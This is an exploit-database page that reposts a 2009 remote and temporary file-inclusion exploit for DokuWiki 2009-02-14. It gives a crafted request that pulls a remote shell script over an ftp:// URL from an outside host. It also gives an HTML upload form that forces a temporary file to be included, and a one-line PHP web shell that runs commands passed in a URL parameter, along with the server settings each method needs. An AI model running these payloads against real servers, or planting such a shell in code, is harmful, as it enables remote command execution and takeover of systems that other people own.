Lucene search

K

Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit

πŸ—“οΈΒ 26 May 2009Β 00:00:00Reported byΒ Nine:Situations:GroupTypeΒ 
zdt
Β zdt
πŸ”—Β 0day.todayπŸ‘Β 12Β Views

Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit information, ftp and file upload method for shell executio

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
===========================================================
Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit
===========================================================


Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit
tested and working


[quote]
It's not a RFI couse use of file_exists function.
[/quote]

How wrong brother!

trick 1 (ftp:// wrapper with php 5):
needs register_globals = on
allow_url_fopen = On (default)
allow_url_include = On (not default)

http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:[emailΒ protected]/folder/sh.php&cmd=ls%20-la>out.txt

trick 2:
needs register_globals = on
file_uploads = On (default)

include a temporary file passed by the $_FILES[] array:

<form action="http://[host]/dokuwiki-2009-02-14/doku.php?cmd=ls%20-la" method="post" enctype="multipart/form-data" target="_self">
<input name="config_cascade[main][default][]" type="file">
<input type="submit" value="submit">
</form>

where your shell is like:
<?php passthru($_GET[cmd]); die();?>

because when there is no prefix or suffix for the affected var, it remains like this:
/path_to_temporary_folder/php93.tmp !



#  0day.today [2018-01-05]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 May 2009 00:00Current
7.1High risk
Vulners AI Score7.1
12
.json
Report